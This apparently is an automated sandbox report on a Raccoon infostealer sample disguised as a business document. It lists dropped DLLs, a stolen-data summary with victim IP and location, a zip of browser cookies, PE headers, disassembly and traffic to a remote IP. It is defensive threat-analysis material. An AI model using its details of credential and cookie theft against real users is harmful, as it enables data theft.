Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s6.7W..7W..7W..>/..5W...5..5W...5..6W...5..>W...5..<W...7..4W..7W..*W...4..6W...4`.6W...4..6W..Rich7W..................PE..L....B.\.........."!......................... ...............................`.......r....@..................................$..P....@..x............".......P.. .... ..T............................ ..@............ ..h............................text...P........................... ..`.rdata....... ......................@..@.data........0......................@....rsrc...x....@......................@..@.reloc.. ....P....... ..............@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.54005414297208
Encrypted:	false
SSDEEP:	3072:8Af6suip+I7FEk/oJz69sFaXeu9CoT2nIVFetBW3D2xkEMk:B6POsF4CoT2OeYMzMk
MD5:	4E8DF049F3459FA94AB6AD387F3561AC
SHA1:	06ED392BC29AD9D5FC05EE254C2625FD65925114
SHA-256:	25A4DAE37120426AB060EBB39B7030B3E7C1093CC34B0877F223B6843B651871
SHA-512:	3DD4A86F83465989B2B30C240A7307EDD1B92D5C1D5C57D47EFF287DC9DAA7BACE157017908D82E00BE90F08FF5BADB68019FFC9D881440229DCEA5038F61CD6
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....@.\.........."!.........b...............................................P.......\|....@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\ucrtbase.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142072
Entropy (8bit):	6.809041027525523
Encrypted:	false
SSDEEP:	24576:bZBmnrh2YVAPROs7Bt/tX+/APcmcvIZPoy4TbK:FBmF2lIeaAPgb
MD5:	D6326267AE77655F312D2287903DB4D3
SHA1:	1268BEF8E2CA6EBC5FB974FDFAFF13BE5BA7574F
SHA-256:	0BB8C77DE80ACF9C43DE59A8FD75E611CC3EB8200C69F11E94389E8AF2CEB7A9
SHA-512:	11DB71D286E9DF01CB05ACEF0E639C307EFA3FEF8442E5A762407101640AC95F20BAD58F0A21A4DF7DBCDA268F934B996D9906434BF7E575C4382281028F64D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........E..............o........p..................................................................Rich............................PE..L....3............!.....Z...........=.......p...............................p............@A........................`................................0..8=......$... ...T...........................H...@............................................text....Z.......Z.................. ..`.data........p.......^..............@....idata..6............l..............@..@.rsrc...............................@..@.reloc..$...........................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\machineinfo.txt Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	1106
Entropy (8bit):	5.28172224985014
Encrypted:	false
SSDEEP:	24:DlANiH/l3e7qy53Net5IBdBqhKQa7nCGik/R8RAuLTvqzh:BAk93a3NetmBgOCGik/R0As0h
MD5:	9DA5570EF09832D6F01B52BC6CA62546
SHA1:	C0D1986777840536377683AEF2C0494382D946D8
SHA-256:	5FB23008892B0C392663B68A2ED4A80B75AC16C50F513F6B30BA8863272A089E
SHA-512:	90F5AFF5F5C1F53780DF8ABDCEF050E9065F7F0F3D81B00A68B84B5DCEA3F647C9023581CF3AF72CA43AAD7248FC422E6CD34A0D593A36FACA5AFE338D2C0638
Malicious:	false
Preview:	Raccoon \| 1.7.3...Build compile date: Sat Feb 27 21:25:06 2021...Launched at: 2021.03.30 - 12:22:53 GMT...Bot_ID: D06ED635-68F6-4E9A-955C-4899F5F57B9A_user...Running on a desktop......-------------...... - Cookies: 1... - Passwords: 0... - Files: 0......System Information:... - System Language: English... - System TimeZone: +1 hrs... - IP: 84.17.52.79... - Location: 47.431702, 8.575900 \| Zurich, Zurich, Switzerland (8152)... - ComputerName: 980108... - Username: user... - Windows version: NT 10.0... - Product name: Windows 10 Pro... - System arch: x64... - CPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz (4 cores)... - RAM: 8191 MB (5383 MB used)... - Screen resolution: 1280x1024... - Display devices:....0) Microsoft Basic Display Adapter......-------------......Installed Apps: ....Adobe Acrobat Reader DC (19.012.20035)....Adobe Refresh Manager (1.8.0)....Google Chrome (85.0.4183.121)....Google Update Helper (1.3.35.451)....Java 8 Update 211 (8.0.2110.12)....Java Auto Upda

C:\Users\user\AppData\LocalLow\rQF69AzBla Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7006690334145785
Encrypted:	false
SSDEEP:	24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
MD5:	A7FE10DA330AD03BF22DC9AC76BBB3E4
SHA1:	1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
SHA-256:	8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
SHA-512:	1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\rZCi5EILFcp.zip Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	1190
Entropy (8bit):	7.508914675532032
Encrypted:	false
SSDEEP:	24:9jqxcEnbA9VeDVO7FD0wQfOceEi3C615moU+nvluhH9GfRe/:9jmnMuZKNK/sC615tuhHKe/
MD5:	7F6662399EBE787AD70B7AAB8668ED62
SHA1:	9E3739C63A7EE1AF6855BD4301732B04E90DB6AE
SHA-256:	CCED05FDCF082EF840E33AF29AC7DF092B3BE58F2629EFF1BC7C7B0321FB2027
SHA-512:	F0BA34739BA21B4B5101F6729909E58071FBC11D896F6256C86155D5795CA3CF4CDE69FDF9A12942FDD2EB73E0CE18A3C7FFCE341FF09B6A9082E6E6062F0455
Malicious:	false
Preview:	PK.........r~RH.._...........browsers/cookies/Google Chrome_Default.txtUT...94c`94c`94c`%..r.0...5..hCR.a.E.."J}.N....WBu..~}.=..T...<j';~..........4...^.2..y...V...~..h....\|.2 }...9L@J..D=.F...^'......u.............i.%o.J1B...Fr..._.!.%..`....e:....Q;.~....x{.....O.PK.........r~R.R\|.....R.......System Info.txtUT...=4c`=4c`=4c`uS.n.0.}.......$...i....A.b@_..V...eHvo..N.^.j..\|xH...Jf.1%..FB.\|.7..!3.J..rY.........g.....S.~).2..d..0B=.Q.......l.i...b.....i..Q...?..Q,.d.Gq<.s......).C.US....f(!W.6....>>G...1.Z..X.,.sO......ca./...W.=\....e.M.t..r).m#.(.....>.7z.n0..~0.Y.Y/..D>a!...q.^..x..!.=.R~.....).&.4Vg....I.....a.1..ou.V.J...8..F...)[..^......<9xT.........diM.d5..{2...s..f......dy..z.*..!.e.`..... ..~.'>...W..8XV...U.@.X.`1...".=4N.=c.Y.J@.S4G....3..O`.]U....G.ac..F...5...0.Ngo.4......]...E...V..I.........&.......,&.q.)...R..........#....1[......B..".0.>...v..\..1.n. .8.~.G.QO.a$......)iS...A8f....y.....:...85.w..0.=....Q0.....Y..>\|..

C:\Users\user\AppData\LocalLow\sqlite3.dll Download File
Process:	C:\Users\user\Desktop\CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	916735
Entropy (8bit):	6.514932604208782
Encrypted:	false
SSDEEP:	24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
MD5:	F964811B68F9F1487C2B41E1AEF576CE
SHA1:	B423959793F14B1416BC3B7051BED58A1034025F
SHA-256:	83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
SHA-512:	565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...\|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........

\Device\Null Download File
Process:	C:\Windows\SysWOW64\timeout.exe
File Type:	ASCII text, with CRLF line terminators, with overstriking
Category:	dropped
Size (bytes):	92
Entropy (8bit):	4.300553674183507
Encrypted:	false
SSDEEP:	3:hYFEHgARcWmFsFJQZtctFst3g4t32vov:hYFE1mFSQZi3MXt3X
MD5:	F74899957624A2837F2F86E8E62E92D4
SHA1:	1FCDAC5DEC5B0B1E00CF0247DA2A5F18566F1431
SHA-256:	507992A303C447D1D40D36E2E5163A237077B94F23A7089AC90A2F08682AE9BC
SHA-512:	E3FD14728633614B6552A75C15079AC8B04C0E8B3F49535B522C73312B1C812E30A934099AB18B507A0B4878068987D5545E90FA3747F7E7B10360EE324DB435
Malicious:	false
Preview:	..Waiting for 10 seconds, press CTRL+C to quit ..... 9.. 8.. 7.. 6.. 5.. 4.. 3.. 2.. 1.. 0..

Static File Info

General
File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	5.504395846919052
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	CopyDocs-BUSINESS-CONFIRMATION_NO-MGFT560_0w9wMGT500383RRTF.exe
File size:	118784
MD5:	edeff76475b73d1ea8f9f8eb8afdb738
SHA1:	0ec4cf852db313d8d6c7896f4a8fd10f73228749
SHA256:	a214379d617efa77932adcbd90240cf0fb0ba443b50d4f93475edde4d53b1681
SHA512:	8577148209f70131862af561f78eaee6c411fda46f1a3e66aaa6da3bcf5e8b7efa400abf71d72d54e176009e357ec37d3cdb938d72d2d409f4f190b7800c59ab
SSDEEP:	1536:QHkRBdOqELc7FRQe4AdbrS50h3yqiL46R2AvVvYF1ZfwXE:FD7FZRkElF4U
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......u...1...1...1.......0...~...0.......0...Rich1...........PE..L...b."S..................... ....................@................

File Icon


Icon Hash:	e6e6fa6a6e949084

Static PE Info

General
Entrypoint:	0x401888
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
DLL Characteristics:
Time Stamp:	0x5322B062 [Fri Mar 14 07:31:46 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	6ea4bc64786f6c0830d4d2794c2af5e1

Entrypoint Preview

Instruction
push 0040E318h
call 00007F1B00599173h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
inc eax
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add ah, dl
pop es
aad FAh
sub dword ptr [498247ADh], ebp
mov ah, 53h
add edi, dword ptr [ebx]
ucomiss xmm0, dqword ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ecx+00h], al
and byte ptr [eax], cl
inc ecx
add byte ptr [ebx+75h], dh
insb
jbe 00007F1B005991E3h
jnc 00007F1B005991F7h
je 00007F1B005991F4h
popad
popad
jo 000091E4h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
dec esp
xor dword ptr [eax], eax
pop ss
xor al, 42h
fdivr qword ptr [edi+edx*8]
jmp far 52B9h : 658149D6h
popfd
and ecx, dword ptr [eax+ebx*8+06h]
out dx, eax
xor byte ptr [edx-2Ch], ch
sub byte ptr [ebp+635DAB49h], FFFFFFFCh
jnp 00007F1B00599149h
idiv dword ptr fs:[edx]
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x19d84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x1c000	0xcb4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1c8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x193b4	0x1a000	False	0.316575270433	data	5.78907672784	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x1b000	0xa88	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x1c000	0xcb4	0x1000	False	0.3427734375	data	3.23515501926	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x1c40c	0x8a8	dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 16776176, next used block 10526884
RT_GROUP_ICON	0x1c3f8	0x14	data
RT_VERSION	0x1c0f0	0x308	data

Imports

DLL

Import

MSVBVM60.DLL

_CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaStrVarMove, __vbaFreeVarList, _adj_fdiv_m64, __vbaFreeObjList, _adj_fprem1, __vbaHresultCheckObj, _adj_fdiv_m32, __vbaAryVar, __vbaAryDestruct, __vbaObjSet, __vbaOnError, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaCyStr, __vbaVarTstLt, __vbaFpR8, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaStrCmp, __vbaAryConstruct2, __vbaVarTstEq, _adj_fpatan, __vbaLateIdCallLd, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaFpCmpCy, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaStrVarVal, _CIlog, __vbaFileOpen, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaFreeStrList, __vbaDerefAry1, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarTstNe, __vbaI4Var, __vbaVarAdd, __vbaLateMemCall, __vbaVarDup, __vbaStrComp, __vbaFpI4, _CIatan, __vbaAryCopy, __vbaStrMove, _allmul, __vbaLateIdSt, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0400 0x04b0
LegalCopyright	DcDFab 4
InternalName	indsetknopw
FileVersion	4.05.0001
CompanyName	Boshiyuki Tasui
LegalTrademarks	NewsID SSA GEnerator
Comments	Buawei
ProductName	BechSmith Corporation
ProductVersion	4.05.0001
OriginalFilename	indsetknopw.exe

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 30, 2021 14:22:42.490082979 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:42.757600069 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:42.757699966 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:42.773632050 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.041050911 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.042459965 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.042481899 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.042495966 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.042622089 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.122325897 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.391762018 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.391885996 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.410388947 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689534903 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689562082 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689582109 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689606905 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689627886 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689640999 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689647913 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689670086 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689676046 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689691067 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689707041 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689709902 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689733982 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689749002 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.689757109 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.689799070 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.958785057 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.958822966 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.958841085 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959006071 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959064007 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959100962 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959122896 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959147930 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959188938 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959230900 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959280968 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959305048 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959326029 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959350109 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959374905 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959387064 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959397078 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959415913 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959422112 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:43.959462881 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:43.959485054 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226330996 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226356983 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226370096 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226417065 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226435900 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226448059 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226452112 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226461887 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226480007 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226494074 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226499081 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226500034 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226517916 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226530075 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226543903 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226555109 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226558924 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226569891 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226583958 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226593018 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226630926 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226644039 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226665020 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226772070 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226789951 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226809025 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.226831913 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.226855040 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.227247953 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.227266073 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496031046 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496061087 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496083021 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496104956 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496126890 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496151924 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496159077 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496176004 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496196985 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496201992 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496201992 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496225119 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496243000 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496248007 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496270895 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496284008 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496294022 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496309996 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496315956 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496340990 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496355057 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496366024 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496387959 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496396065 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496431112 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496520996 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496543884 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496563911 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496579885 CEST	49742	443	192.168.2.4	111.67.28.15
Mar 30, 2021 14:22:44.496584892 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496607065 CEST	443	49742	111.67.28.15	192.168.2.4
Mar 30, 2021 14:22:44.496628046 CEST	443	49742	111.67.28.15	192.168.2.4
